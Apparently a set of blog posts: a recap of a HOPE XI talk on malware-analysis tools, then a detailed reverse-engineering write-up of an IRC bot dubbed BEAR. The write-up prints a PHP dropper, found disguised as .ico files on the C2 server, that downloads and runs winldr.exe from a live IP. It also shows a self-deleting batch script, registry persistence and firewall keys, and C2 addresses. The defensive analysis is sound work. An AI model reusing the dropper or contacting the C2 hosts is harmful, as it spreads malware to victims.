HOPE XI

This weekend I attended Hackers on Planet Earth (HOPE) XI in NYC. Saturday night there was a presentation from Robert Simmons of ThreatConnect on open source malware labs. All the talks are going to be placed online at some point, but I thought I’d highlight some of the material Robert presented in the meantime.

Robert spoke about the use of either open source or otherwise free tools for analyzing malware. By “otherwise free” I mean tools that might require registration or some other action to be performed in order to obtain access. He attributed his overall analysis framework to some of Lenny Zeltser’s work, highlighting four main areas where the lab (open source or otherwise) can impact the organization:

1. Malware Research
2. Enhanced Threat Intelligence
3. Network Defense
4. Fun [IMO, it’s more fun once you figure the sample out]

Robert also spoke about some of the benefits of an automated malware analysis system. He described “hunt teams” which would use an automated analysis system and other tools to enhance threat intelligence. His vision of a hunt team is sort of a “proactive IR”, meaning that rather than reacting to an incident, this team would go searching for malware or other issues and then use the automated system as a force multiplier for analysis. For instance, say the hunt team locates what they believe to be an undetected piece of malware. The team would then use the automated system to begin to build out host and network based signatures, begin to gather pieces necessary for threat intelligence (resolved domains, IP addresses, etc.), etc. This information would then be used to improve defensive measures with updated or new signatures.

His top four entry points for malware are:
1. Files
2. URLs
3. PCAPs
4. Memory Images

My interpretation of this is not that malware literally comes from a memory image, but rather these are the inputs into an automated lab that would then be used to isolate and analyze samples. I think this makes sense because most users aren’t going to be looking through captured packets or memory dumps.

The tools that he highlighted for the talk were:
Cuckoo Sandbox (also the sandbox used by malwr.com)
Thug (low interaction URL honeyclient)
Bro (network monitoring tool)
Volatility (memory forensics)

One really interesting thing that he mentioned is that Bing can be used for doing passive DNS type searches. He demonstrated that by searching Bing for an IP address, it will return all domains that have resolved to that IP address. This could be really useful in the event that you have a sample that doesn’t resolve a domain name but rather handles C2 via a hard coded IP address. For example, BEAR resolved her.d0kbilo.com (37.59.118.41) this IP is actually associated with a few other malicious domains (e.g., l.kokoke.net). If you lookup an IP address that you feel is suspicious (say from captured packets during dynamic analysis) and notice that it is associated with numerous domains related to malware, you could safely assume that the traffic you found is suspect and should be looked at in more detail. I tried using Bing for this with the BEAR IP address, and didn’t have much luck with it, however trying other IP addresses associated with botnets did reveal other domains that currently or previously resolved to that address. That said, I got some similar results searching on Google also, so perhaps it’s best to just try various search engines for this type of research and then see if you get results from one search engine that you might not get from another.

Anyway, going through the tools, Cuckoo Sandbox is a great tool that I actually use all the time via malwr.com. You can think of a sandbox as sort of an automated container for malware that creates a virtual environment each time a sample is analyzed. In the case of the malwr.com instance, it drops the sample into a Windows XP (or other) environment and then lets the malware run while observing behavior. It’s nice to use a sandbox because it can help get a lot of basic info sorted out for you quickly, such as generating hashes, searching for strings, and so on. These are typically actions that you take with every malware sample that you work on. You can also observe dynamic information such as network activity and dropped files in the sandbox. One thing to keep in mind is that you need to have an understanding of the “baseline behavior” of what sample you are analyzing and the environment so that you can recognize normal behavior that the sandbox might flag. For instance, if you are analyzing a malicious PDF, you should be aware of what files might be dropped or what actions Acrobat Reader will take that are part of normal operation (such as dropping a SQLite database) vs. what can be traced back specifically to the sample you are working on.

Thug is a tool that I haven’t heard of before this talk, and from what I hear isn’t that well known just yet. Thug complements tools like Dionaea. Dionaea and other honeypots will sit out there and collect attacks that are directed towards machines, while Thug is a honeyclient that will go and simulate a connection to suspect sites, in this case websites. It works by crawling sites and simulating various client-side software (e..g, Flash) and trying to see what is triggered by the possibly malicious website, then saving these results for later analysis.

Bro Network Security Monitor could be described simply as an IDS, but it appears that this description doesn’t really do it justice. It’s more of a framework than a system, and it’s actually been around since the 1990s so it has quiet a bit of experience backing it up at this point. Though Bro’s focus is on networking monitoring, you can also use Bro to do traffic analysis, which is how Robert presented this tool during the talk. I remember one interesting point he made was that Bro is very good at recognizing types of traffic – so, if you see captured traffic that Bro didn’t identify, chances are it’s something very shady since at this point Bro will successfully identify pretty much anything that is legitimate. I think sometime I’m going to try using Bro instead of other tools (like Wireshark) and see what results I get.

The last tool that he mentioned was Volatility, which probably doesn’t need an introduction but I’ll talk about it a bit anyway. Volatility is a framework for volatile memory analysis/forensics. There are a few reasons why you might want to look into this type of memory. One is that you might be able to get a better look into things that would otherwise have been obfuscated during static or dynamic analysis. For example, when I analyzed BEAR, you didn’t see the domain or IP address for the C2 server in the static analysis, but you did observe it in the memory dump that I did just with one of the sysinternals tools. Another thing that you can do, which Robert highlighted in the talk, is compare two views of internal memory to see what has changed because of the malware. He took a sample of “normal” memory and then a sample of memory after running the suspicious file and then compared the two in order to help determine what new processes (and other indicators) were associated with the malware sample.

This was a great talk. A couple of other things – one was that Robert had a really clean format for displaying analytical results in swimlanes. He basically set up a swimlane for each of the four tools and then inserted the signatures obtained by each tool in the respective swimlane. I thought it was a great visualization, and I think I’d like to try it at some point with one of my future analyses. The other thing that was nice was that it looks like Robert’s thought process around malware analysis (at a high level) lines up with what I learned, so it was a good validation of how I’ve taught myself and the materials that I used.

Robert has some interesting repositories up on his GitHub site and he’s also on Twitter if you’re interested in following his work.

BEAR, Part II

Next up is to analyze the decrypted payload from the previous analysis (BEAR). One interesting thing is that this sample failed to run in the malwr.com sandbox, so I wonder if there’s something in the sample that prevented that or if it was just a random failure.

Looking at strings, I’m finding that it appears to be in the clear and without the same obfuscation as the launcher:

bear2-1

The strings observed are mostly the same as the ones in the prior analysis, the ones recovered from the running process image. I do see one string that I don’t recall seeing in the prior analysis, this one having to do with the registry:

bear2-2

Opening the payload in PEview, we see much more information than last time. One thing I noted was the the date/timegroup in this file was 2009/12/24 13:25:55Z. These can be patched after the fact, but I wonder if this indicates that this is actually a very old sample that has just been repackaged recently.

There are also several imports that are in the clear:
– msvcrt.dll
– kernel32.dll
– ws2_32.dll
– user32.dll
– advapi32.dll
– shell32.dll

I’ve included the full list of imported functions in the report linked to at the end of this analysis, but I’d like to mention a few of them:

WS2_32: WSAStartup, Socket, Bind, Listen, Connect, Send/Recv, GetHostByName, Inet_Addr

This sample uses the lower-level (when compared with a DLL such as wininet.dll) library to establish networking. Using WS2_32 can require more “construction” of various parts of traffic, such as headers. This can lead to more signatures within the malware itself – possibly hard coded user agents, for instance, or typos that are slightly different than a legitimate user agent. GetHomeByName is used to resolve a domain name, while Inet_Addr is used to convert that resolved IP address string to something for other functions to use. WSAStartup is used to initialize networking, so a good way to find where the networking functionality begins is to look for this function in the disassembly or set a breakpoint for this function in the debugger. One thing I find curious about these imports is that it seems that there is a function missing here. Between a client-side and server-side instance, here are what you would typically see:

Client side calls:
1. WSAStartup (initialize networking)
2. Socket (creates the socket)
3. Connect (connects to the remote socket)
4. Send/Recv as appropriate

Server side calls:
1. WSAStartup
2. Socket
3. Bind (attaches the socket to a port)
4. Listen (sets the socket to listen for traffic)
5. Accept (waits for an incoming connection from a remote system)
6. Send/Recv as appropriate

What’s absent from the imported functions above is Accept. I double checked, and I do not see that being imported. This would only be required under the server side calls – I’m guessing that this malware is a client, however given the number of functions imported I’m a bit surprised to see Accept missing from the list. Perhaps this is an oversight, or maybe this function is called some other way (an indirect call like CALL EAX), or finally it might be a clue as to the malware’s function.

Kernel32: CreatePipe, PeekNamedPipe

Pipes can be used to simplify connectivity to a remote C2 server. PeekNamedPipe is called to copy data from a named pipe without removing it.

Kernel32: CreateMutexA

Mutexes are sometimes created to help ensure that multiple instances of the malware are not running at the same time on the same machine. The malware will check for the presence of the mutex and then exit if found. This can also be a good way to find host-based signatures, in the event of a hard-coded (fixed) mutex name. Later on, we actually do observe a mutex created (dc3d5c2012d372867 88b94a5d50d7a3cf0).

ADVAPI32: CryptAcquireContextA, CryptReleaseContext, CryptGenRandom

CryptAcquireContextA is used to initialize windows encryption. The others relate to other encryption functions.

Kernel32: GetTickCount, QueryPerformanceCounter

These both can be used in anti-debugging operations, however they can also have other uses as well. For example, in the BEAR launcher we saw that GetTickCount was essentially used to seed a random number generating function.

Kernel32: SetFileTime

This can be used to modify the creation/last access/last modified dates and times on files, which can be used to hide malicious modifications to files on a victim machine.

Shell32: ShellExecuteA

This is used to execute a new program – I wonder if this will be used to run the self-deletion batch file, or something else. I’ll be looking out for new processes and calls to this in the disassembly and debugger.

ADVAPI32: RegClose/Open/CreateKey, RegDelete/Enum/Query/SetValue

I see several functions that are used to create, open and close registry keys as well as look for, delete and/or set values in keys. We saw that the BEAR launcher achieved persistence via the registry, so this is probably what is happening here.

Kernel32: GetLocaleInfoA

I’m curious to see how the malware uses this function – does the payload behave differently based on where the host is located, or upon the language of the victim?

Kernel32: WriteFile, CopyFileA, DeleteFileA

I always like to see these, because it means that I should see something created or removed that could either lead to more clues to functionality or act as a good host-based signature.

As a side note, once grouping of functions that I am not seeing is the set of functions associated with process replacement or injection, which we did see in the BEAR launcher.

Checking out KANAL, there’s a few different things here. First, it picks up the base64 index that we could see above in the results from strings. Next thing is that it picks up on a call to an imported crypto function. Final thing is that it sees is constants for MD5. It’ll be interesting to check these references out in the disassembly to see how these are being used.

bear2-3

Dynamic Analysis

During the analysis of the BEAR launcher, it was observed that the behavior was much different when running the sample as a regular user (i.e., not as an admin). For this reason, I opted to run the payload as admin and skip testing as a regular user, with the assumption that the payload would be similarly affected.

One change immediately noticed was the addition of the following keys to the registry:

HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

We saw one of these exact keys earlier, in the strings output:

bear2-4

Looking in the registry at this location reveals:

bear2-5

HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\Windows\system32\spooIsv.exe: “C:\Windows\system32\spooIsv.exe:*:Enabled:Windows DLL Loader”

This value was also added:

HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows DLL Loader: “C:\Windows\system32\spooIsv.exe”

Next, the following file was added:

c:\Windows\SysWOW64\spooIsv.exe

And the following file was deleted:

c:\MA\lab\payload.exe

The method of deleting the sample was the same as in the other analysis – a randomly named batch file was created (with the same instructions) and this was run to delete both the original payload executable and the batch file.

Oh, look at this – here’s spooIsv.exe, but look at the date/time group:

bear2-6

This is almost certainly the place where we see usage of kernel32.SetFileTime to help hide the sudden appearance of this malicious file. The file is also hidden, and happens to be the exact size of the original sample.

Comparing the MD5 hash of each confirms that it’s the same file:

bear2-7

You can observe further confirmation of this file being added to the registry to run at startup:

bear2-8

As mentioned earlier, we do observe a mutex created:

bear2-9

As far as network activity, nothing different was observed between the prior analysis and this one. For full details, please refer to the BEAR launcher analysis.

The payload exhibits the same behavior as the launcher in terms of the iterations of spawned/replaced processes, so please see the prior analysis for details. However, one difference is that when this payload is executed on its own, it does not create two new processes for replacement – only a single instance of each new process is observed.

Disassembly / Debugging

The disassembly is much easier to follow in the payload when compared with the launcher, thankfully.

One of the first major functions after startup is sub 406845. Many things happen in this sub, and I’ll cover the interesting ones here:

Sub 40650E gets the filename and directory of the running process. Soon after that, the malware looks at the filename of the running process and makes a comparison. Based on this comparison, the malware branches:

bear2-10

If the branch “fails”, then it gets the system directory and then does what I presume is some decoding of strings with a loop:

bear2-11

Here’s an example of one of the decoding functions:

bear2-12

What’s interesting about this block starting at 406885 is that it appears to look for a string (that it concatenates) and it will loop to try and find this string – if successful, it will then jump to 406931 where the registry settings to have the program run at startup are made. If these iterations finally fail (or if the original branch at 40687C is true) then the sub that I call the RegistryAutoruns function is called but in this case to actually delete the registry settings and also log that the malware was uninstalled (this info is sent to C2 using a sub starting at 409003):

bear2-13

Here’s a code snippet to show part of the “CreateBATDeleteAll” sub where we see the batch file being created and executed via ShellExecuteA:

bear2-14

Another couple of blocks of code within this overall function includes sub 40642D which contains the code for setting up the registry keys/values to run the sample at startup:

bear2-15

Within this sub, we also see sub 40627D which makes the registry changes for the firewall access:

bear2-16

Notice also the line that prints a string that logs this change to the system. This generally seems to be a pattern with this malware — you see the string that is recorded for the logging aspect of the function being performed, and then you see calls into the functions that actually perform those actions.

Getting back to the beginning of the disassembly, we see that the system is set to sleep for 1 second (0x3E8) and then the malware creates a mutex:

bear2-17

If there are issues with the mutex creation, then the malware loops back to the code we already discussed. Otherwise, we get to a dense block starting at 409C73:

bear2-18

Stepping through this:

The sub at 4053B1 contains LOTS of plaintext calls to LoadLibraryA and GetProcAddress:

bear2-19

I think most of this stuff we already were aware of, at least on a high level, but some interesting calls to LoadLibrary and GetProcAddress include a load of netapi32.dll and one of the functions used from that is NetScheduleJobAdd which can be used to schedule a run of a program at another time. From this same library is a call to get the address of NetShareEnum which is used to enumerate through network shares and NetUserEnum (similar but for users).

Sub 405F28 is more of the same, just different libraries and shorter:

bear2-20

Sub 407B36 calls memset and InitializeCriticalSection. Sub 403008 is interesting and I can’t say that I fully understand it, but it appears to obtain random data using the __imp_clock function and transformations of that data. There is a function that I’ve named ClockCallAndTransform that is also called. Here are both functions:

bear2-21 bear2-22

bear2-23

This ClockCallAndTransform is the major thing that happens within 403008 and is also called elsewhere (such as from this overall block of code we’re looking at now).

Sub401EF2 contains calls to set up crypto in this program:

bear2-24

Sub 401000 sets up the base64 index in a spot beginning at 40EAD0:

bear2-25

Sub 4020DF has to do with MD5 encoding, with several subfunctions. One of its first subs is 401478 where we see the MD5 constants set up:

bear2-26

The next two calls are to 4014A0 and 40153F, which themselves work with a function at 40160C, which appears to be the main MD5 sub. We can see the precomputed MD5 table for each round in plaintext:

bear2-27

This is a LONG sub, stretching from 40160C down to 401EAB. Japanese Media Manager has a post of the assembly code for MD5, in case you are interested (or see references below).

This work done with MD5 is called two additional times (total of 3) and then the mysterious clock function is called four times. This block wraps up with getting the module handle and filename. See below for the fully renamed block:

bear2-28

Pressing on, we see some stuff done with the module handle and filename we gathered at the end of the prior block, and then we get to a denser area starting at 409D28. Sub 406637 is an interesting call in this area. In this sub we see a lot of calls to some of the same functions discussed earlier (the ones setting up persistence, creating the batch file, etc.) but we also see an interesting call at 406382 which is where we see the file time being faked on the installed copy of the malware:

bear2-29

After this is done, then we see the call to WSAStartup which is the beginning of the network activity (at location 409D48). A small block begins at 409D4E, and the first sub called (408D4A) contains lots of networking setup activity via WS2_32 function calls. Throughout all of these calls there are also multiple calls to the XOR transformation subs already discussed and labelled.

There is one very interesting sub within this big mess, though, which is at 408A9F. This is the sub where the initial communication with C2 is handled via IRC. First, clock data is gathered with a call to a sub at 4069B5. Following this, there’s a block at 408A9F where we see the connection password is sent which must be done before the user registration takes place:

bear2-30

Soon after, we see the creation of the user registration string that is then sent to C2 starting at 408B43:

bear2-31

After this, some checks are done on a couple of the arguments passed to the function and then the system will either branch to start what appears to be a system inventory or it will connect with the generated nick on the IRC server. There is a call to a sub at 407A55 which calls GetTickCount and QueryPerformanceCounter twice and then carries out transformations of various types on the returned values. Another sub within the system inventory branch is 4070D9 which collects the locale info. This sub checks to see if the locale returned is “USA” so I wonder if this is an indication of targeting of particular users. A call to 407750 finds the connected drives and their sizes. A call to 4074B2 XORs four strings and then also sets up commo using those strings, then later we see a call to GetVersionExA and then the major version is checked to see if the host is running Windows XP or something else (Windows 5.1):

bear2-32

After this, we see what looks pretty much like the construction of the nick for the malware’s IRC connection, and then the channel name #balengor:

bear2-33

I’m guessing that this system inventory info might have some role in the way the nick is constructed. It would make sense that the nick would be used to give the author(s) an idea of what system type and capabilities are associated with each nick. Lower we see where the NICK command is actually sent to the C2 channel:

bear2-34

Now, stepping WAAAAY back out several levels back to the block starting at 409D4E, the next call there after we’ve done all this system inventory and bot registration on IRC is the sub at 4079DE. This is another sub that takes two calls to GetTickCount and QueryPerformanceCounter and then does transformations with them. I’m stating to think that these are some sort of random data generator and not involved with anti-analysis.

The next major block is at 409D71, which consists essentially of a call to a tiny sub that will MOV a socket into EAX and then a call that sets up and calls the select function from WS2_32, which will determine the status of a socket to perform synchronous I/O. We see another branch from there that will call recv in WS2_32:

bear2-35

One interesting little thing here:

bear2-36

We see this floating around – in the prior analysis it was observed that the PING commands sent via IRC happened roughly every 90 seconds – this helps confirm that the stuff being done with the clock is used to generate random data. I guess the author(s) thought that sending these commands at exactly 90 second intervals would attract attention, so this mechanism was put in place to make sure that the commands were sent slightly randomly but still close to the 90 second interval.

This entire section loops continuously:

bear2-37

Sub 409B98 appears to be where the data from C2 that was obtained with the call to recv is processed. Some highlights from inside this and subordinate subs:

Checking for certain IRC traffic:

bear2-38

Here’s an interesting spot where the program appears to set itself up to look at the base64 encoded string from the topic in the C2 IRC channel #balengor:

bear2-39

Sub 401022 is where we see that string being worked with:

bear2-40

I’m calling the sub at 409B98 “GetCommandsFmTopic”. A few levels into this sub, after doing some work to parse through input received through the C2 IRC channel, we see this sort of innocuous call:

bear2-41

This leads us to a HUGE sub, look at this graph:

bear2-42

I was kind of hoping that I was getting near the end and could wrap this up soon…

4090AE seems to be the main sub where it appears all of the functionality is controlled. The structure looks like a series of if-statements that take the input from C2 to the malware and check the strings and then take actions. For example, the first thing it does is check for the string “PING”:

bear2-43

If it sees “PING”, then it branches elsewhere and sends this command to the IRC channel:

bear2-44

It checks for PING, PONG, MODE, PRIVMSG, etc. At some point we see a check for “433”:

bear2-45

If 433 is detected, i.e., if the jump is NOT followed, then we proceed to an area where the various subs are called to hide the installed malware with a fake file time and delete the original files, check for the locale, do an inventory of drive types and size, get OS info, and then send the NICK command in IRC (I’m only including one of the earlier screenshots because it’s a lot of material to post otherwise):

bear2-46

Other branches give interesting results. Seeing the string “ERROR” seems to send the bot down the path of taking a system inventory and then registering itself; the “JOIN” string can take you down a path where the USERHOST command registers the host the bot is connecting from or it can take you down another path where you check for “001”. This has you set the user mode and join the channel. “451” registers the bot on IRC. “302” leads you down a path where you check for data with an @ in it, probably a userhost string. “NICK” can have you copy a string (I’m assuming the bot nick on the server). “332” has you do some decoding of a base64 string, probably the channel topic that we’ve already seen. The size of this sub itself makes it hard to analyze.

Speaking of hard to analyze, I found a sub that contains two calls to rdtsc (sub 40700B). This function can be used to test for the presence of a debugger. It returns the number of ticks since last reboot, and what a program can do is call it twice (which this one does) and then check to see how long has elapsed between the tests (which this does, it compares the value returned with 1000000). The idea is that if an unreasonably long amount of time has passed, then the assumption is that the program is operating in a debugger. This program appears to just loop endlessly if the two calls take too long. A tick represents 100 nanoseconds, so 1000000 ticks is 0.001 seconds (1 millisecond) so not very long at all. Anyone debugging this function would absolutely get stuck there unless they executed past it or patched the code. Something else must be done to the results, though, because you also see that there’s a call to Sleep for 1000 milliseconds after the first rdtsc call, but I didn’t look into this more as I wanted to keep moving on.

bear2-47

One of the branches in 4090AE connects to another huge sub at 40830A – look at this graph:

bear2-48

This sub does all kinds of interesting things:

– Base64 decoding (again, I’m thinking the channel topic)
– Download a new .exe file (probably an update to the bot software) which actually encompasses several interesting subs: 404866 which is used to set up things like ports and addresses depending on the protocol used (http/80, ftp/21, tftp/69) and under that sub 40464E which constructs an HTTP header if necessary. I also noted that the ftp service is set up as anonymous – if I can find the address, then I could possibly log in anonymously and find more files.
– Quit and restart
– Quit and change servers (that’s interesting…)
– Install or uninstall the malware
– Report system uptime
– Scan IPs
– Run exploits against a list of IPs (sub 403698 is called by sub 403861 to do this)
– List exploit statistics (sub 40399A)
– Start a “Remote command thread” with sub 4042A7 (a remote shell and also the ability to execute remote files)
– Gather extensive system and OS info (to include naming the Windows version found) within sub 40740E | 407132. The malware will recognize a range of versions from Window 95 up to XP/2003, as well as gather processor info.
– Gather network adapter info through subs 407718 | 407523. This will also rate each one as Good / Avarage [sic] / Bad.
– Gather drive info (types and sizes) through subs 4079A6 | 4077CA.

The actual sub that creates the remote shell (403FF3) is actually pretty cool. You can watch it step through the entire process of finding cmd.exe, creating a pipe, duplicating a handle/creating a new process, calling PeekNamedPipe to get data from the pipe without removing it, etc. along with a few error messages.

That pretty much covers the disassembly, at least as far as I want to take it since I need to move on to other things. Debugging was largely unsuccessful, I suspect there are some anti-debugging things going on but I’m not looking into this right now.

I did try to connect to the malware C2 site (37.59.118.41) over anonymous FTP and was able to log in. I found an empty pub folder and three .ico files in the directory. I opened one of the .ico files in notepad++ and found this:

<?php
error_reporting(0);
$ln = “http://37.59.118.41/”;
$nm = “winldr.exe”;
$bt = implode(“”, array(‘f’,’.’,’b’,’a’,’t’
$fl = $ln . $nm;
$bc = “START ” . $nm;

function fileDL ($uf, $pf)
{
$nfn = $pf;
$fn = fopen ($uf, “rb”);
if (!$fn) exit;
$nuf = fopen ($nfn, “wb”);
if (!$nuf) exit;
while(!feof($fn))
fwrite($nuf, fread($fn, 1024 * 8 ), 1024 * 8 );
fclose($fn);
fclose($nuf);
}

fileDL($fl,$nm);
$bf = fopen($bt,”w”);
if(!$bf) exit;
fwrite($bf,$bc);
fclose($bf);
exec($bt);
?>

Well, that’s interesting. Basically what this does is:

– creates a batch file called f.bat that will contain START winldr.exe
– downloads the winldr.exe file in 8k chunks
– executes f.bat which will start winldr.exe as a service

Thanks to the Captain for taking a look at the PHP.

This is what I get when I visit the malware IP with a browser:

bear2-49

No, the live chat button didn’t work. Would have been interesting.

An address of http://37.59.118.41/winldr.exe however, does result in a 24kb file being downloaded.

I tried running the original payload in a debugger to see if I could catch the password being sent, didn’t have any luck. However, I noticed this:

bear2-50

A new C2 domain and port? I tried connecting there via IRC but was unsuccessful.

I need to move on from this sample, but I did do a little observation of winldr.exe and here are the most interesting things that I observed. This sample seems to scan IP addresses, as within a couple of minutes I saw it connect and disconnect from about 9,600 IP addresses (list attached to this post, see below). I also noticed that this piece created 94 threads in a row at one point. Winldr.exe does connect to the C2 server, but to a different channel (#j) and with a different nick format (this instance connected as jlqydetno). One of the online sandboxes had this sample connect to l.kokoke.net on port 8089 (mine didn’t). This file didn’t appear to be packed. A funny thing that I noticed is that one of the functions contains the string “KeepITSimple”:

bear2-51

This file also blows up on Virustotal (42/53 or so). Its size is 24,576 bytes and its hashes are:

winldr.exe hashes:
MD5:6e7b29c6148c94036f7ef7c1f3fa90b9
SHA1:80a80c14d4ab5ae2e08436e4e0536b5a80bfe8ab
SHA256:8b1b55939eb90e878fea2b4013c73ba0421f5d61ab3f52249f44eeaf53f69205
ssdeep:384:tFETgfzaRXAojQiZuRBXnXAWe9drTLUonW41ldc2H0:tYgrmQiwR6WGVnWi7t0

Anyway, some things I could follow up on in the future include:
– Figure out exactly what causes the debugger to fail
– Determine the nick generation system in use, and try to impersonate a bot account on the C2 server
– Try to log traffic over a long period of time to try to observe actual C2 traffic being sent
– More research on uNkn0wn Crew

References:
https://en.wikipedia.org/wiki/MD5
https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
https://github.com/japanesemediamanager/jmmserver/blob/master/hasher/MD5_asm.asm

Findings and observations:
Robust bot software that offers lots of features to the author or other controller. We saw that there was a detailed system inventory function; ability to (at a minimum) inventory local networks; update the C2 server; update the software; provide troubleshooting info to the author(s) in the event of errors; anti-analysis techniques; remote shell access; remote execution; various methods of hiding the malware and its traffic/activities; presumed encoding features to provide information back to C2 in the form of account names, etc.; and features that allow the bot controller to recon remote systems and also attack those systems. We also found many things in this sample and the previous sample (the launcher) to obfuscate the bot code such as encryption (AES) and other encoding (MD5, base64, xor).

Recommendations:
Same recommendations as noted in the analysis of the launcher. One might also consider blocking port 69 for TFTP unless this is actively in use, as this was shown to be one source of downloading updates for this malware.

Conclusion:
Really cool and fascinating bot to work on. Lots of features and functionality for the authors. We saw that not only does it provide some useful features such as the ability to scan and exploit other machines, remote shell access, but also housekeeping functions such as error tracking and reporting and an update feature as well. This was a great sample to work on.

Report:MalEXE001payload-pdf
Scanned IP Address List:IPsScannedByWinldr-exe

Hashes (payload):
MD5:d4851b410d158cf650d3f772e270f305
SHA1:4ee5121b05820e8f04b6560f422180660df29b2d
SHA256:267674ddf67827afa282763e57313fc636f170fbffaf104e69ee4db49d1567d5
ssdeep:1536:daWAQE3GZ8CAu9ax2MaO7tJoQuQQTKZc9q3RXFuEUk:JAQE2UHaO2QQTv4XF9Uk

BEAR

I turn my attention to the sample that came into the new honeypot, mentioned in the prior post. I uploaded the sample and it pretty much blew up VirusTotal:

BEAR1

Nice. Also, I happened to notice that the file has a PE header, which is a welcome change from all the spammy documents I’ve been looking at so far. I didn’t delve too deep into what else the site found because I want to try to see how much I can find on my own – the point isn’t to just upload stuff and have a sandbox do the work for me, I want to see what I can get out of it myself and then “check my work”, so to speak, in the sandbox.

Static Analysis


BEAR2I started with some basic static analysis stuff like strings.exe. What I get is some pretty standard looking stuff – in the beginning (not shown) you see the header and see mention of the .text, .data and .rdata sections. Further down you see what we’re meant to believe are imported functions. GetTickCount could be used as an anti-debugging technique, but it could also have a more conventional use. GetVersion could be used to survey the host in order to see what is running and possibly also to inventory the system. VirtualAlloc can be interesting when associated with other imports that might have to do with process injection, but I’m not seeing those other imports here. WriteFile is always a good one, since this means that something is probably being written (either a file is dropping for some purpose on the host, or perhaps data is written to a file before exfiltration).

After this list of function names, there were pages and pages of random strings. Nothing in there resembled anything like a host name, IP address, messages, file names, mutex names, nothing at all. I’m guessing this file isn’t packed due to the plaintext import names and regular section names, but not sure yet and need to look deeper. My guess right now is that whatever strings, arguments, etc. the sample uses are obfuscated somehow.

Opening this sample in PEview reveals some more info. This particular sample is relatively new, compiled on June 4th of this year. Quickly checking a few anti-debugging things, I see there is no TLS table and the number of data directories looks fine (0x10). The virtual and raw sizes of each section are very close in size to one another, again suggesting that the file isn’t packed and reinforcing the assumption that there’s obfuscation of some sort going on here.

The next tool up is Krypto Analyzer (KANAL) for PEiD. KANAL is a tool that looks through files for indications that there might be some sort of encryption going on. These indications include constants associated with various encryption schemes, function imports related to cryptography, and the like. The main issue with using KANAL is that if the sample uses something non-standard (such as a custom base64 index), KANAL will not pick that up. There are also cryptography schemes that do not use “magic constants”, and those won’t be picked up by KANAL either. In this case, KANAL did find something:

BEAR3

Rijndael was the original name for the Advanced Encryption Standard (AES), and superseded DES. The block size for AES is 128 bits, while key lengths can be 128, 192 and 256 bits. It’s a symmetric-key system, so the same key is used for encryption and decryption. The output from KANAL refers to S-boxes (the [S] and [S-inv] in the screen capture above). Substitution boxes (S-boxes) are matrices used in AES. The first reference above (RIJNDAEL [S]) refers to the encryption side, while the second (RIJNDAEL [S-inv]) refers to the inverse S-box that would be used for decryption. This could mean that this sample both encrypts outgoing traffic as well as receives encrypted incoming traffic from C2. Another nice thing about the KANAL output is that it also shows where the references to these constants are, which will help later with disassembly/debugging.

Dynamic Analysis

After this I jumped into disassembly and debugging to try to get a general feel for this sample, and then took a step back and went through a more structured dynamic analysis with the usual tools (procmon, procexp, wireshark, and so on). When I first ran this sample, I observed the original instance of the sample (PID 3688) spawns a child process of itself (PID 760) shortly after execution, and then shortly after that the original instance (3688) terminates.

The first instance imports kernel32.dll and user32.dll, but the second instance imports these and several others including ws2_32.dll and advapi32.dll. The first time I ran this sample, I did it without an Internet connection and I did not notice any files dropping, however the second time I ran this sample I first obtained an Internet connection and this time I observed a call to WriteFile. This was actually a pretty obvious file that dropped – in the directory where the executable is located, a file called wcsqmpbh.bat dropped in the open, containing the following instructions:

@echo off
:deleteagain
del /A:H /F [samplename].exe
del /F [samplename].exe
if exist [samplename].exe goto deleteagain
del wcsqmpbh.bat

Note that [samplename] refers to whatever file name you’ve given the sample. Strangely, this batch file was executed according to procmon, though the original executable and the batch file remain. Perhaps this is a file that the bot controller could remotely execute should the need arise to cover their tracks, but it’s unclear why these files didn’t actually get deleted following execution. The flags indicate that the batch file was trying to force deletion of both hidden and unhidden copies of the malware, regardless if the file was read-only at the time.

The obfuscation at work in this sample made disassembly and debugging difficult, however I was able to look in the strings in the images of the running samples in Process Explorer and saw many interesting strings. I’ll look at some of these in more detail.

One of the first things that stood out to me was a series of what appear to be IRC commands and a channel name (#balengor). These commands match what I observed in the packets captured in Wireshark and line up with how one would connect to and register on an IRC server, followed by strings that are used to build the commands to join the probable C2 channel, set the appropriate modes for the connected user, and so forth. You also see a reference to Eggdrop, an IRC bot and a version number for this software.

UNK
NICK %s
USER %s %s %s :%s
PASS %s
NOTICE %s :
PRIVMSG %s :
message
NOTICE %s :
PRIVMSG %s :
NOTICE
link!link@link PRIVMSG %s :%s
NICK
USERHOST %s
JOIN %s %s
MODE %s +xi
MODE %s +smntu
JOIN
ERROR
VERSION %s
eggdrop v1.6.16
VERSION link v%d.%03d%s (Win32)
PING
PING
VERSION
VERSION
SEND
DCC
PRIVMSG
MODE
PONG
PONG %s
PING
link!link@link
ndEvery1
#balengor

Here are a few examples of where you see some of these strings in the traffic:

bear4

Another string that stands out is a standard base64 index:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

There’s an extensive section which contains strings mentioning bots as well as related to the various activities that the bot can carry out. I’ve made some of the more interesting ones bold below, but there are strings related to scanning for remote machines, exploitation of those machines, exploitation statistics, remote shell access, file transfer, references to protocols (tftp, ftp, http), parts of a dynamically created user agent, and status messages related to restarting the malware or terminating it.

Scanned
:%s in
sec.
open IP(s) found
:%s is open
– Scanning
:%s for
second(s)
Scanning
:%s for
second(s)
Scanning
:%s for
second(s), t:%u s:%u
– Attempted
exploitation(s) on
IP(s).
Attempting to exploit
with
– Attempting to exploit IP’s in list.
Attempting to exploit IP’s in list.
Exploit statistics –
Listing exploit statistics
bot(s) found with string
No bots found with string
found string
in %s (
– Listing bots with string
%s bots with string
Killing
Listing
Cmd.exe process has terminated.
Could not read data from process.
cmd.exe
Error while executing command.
Remote cmd thread
open
Received
from
sec with
KB/sec
– Receiving
from
Receiving
from
Content-Length: %u
Content-Length:
GET /%s HTTP/1.0
Host: %s
– Unsupported protocol specified.
– Error while downloading
– Unable to start
– Successfully downloaded
with
KB/sec%s.
, executing
, updating
– No file to download specified.
tftp://
anonymous
ftp://
http://
– Cannot read source file
– Cannot write to destination file
file://
– Downloading
Downloading
.exe
QUIT :restarting
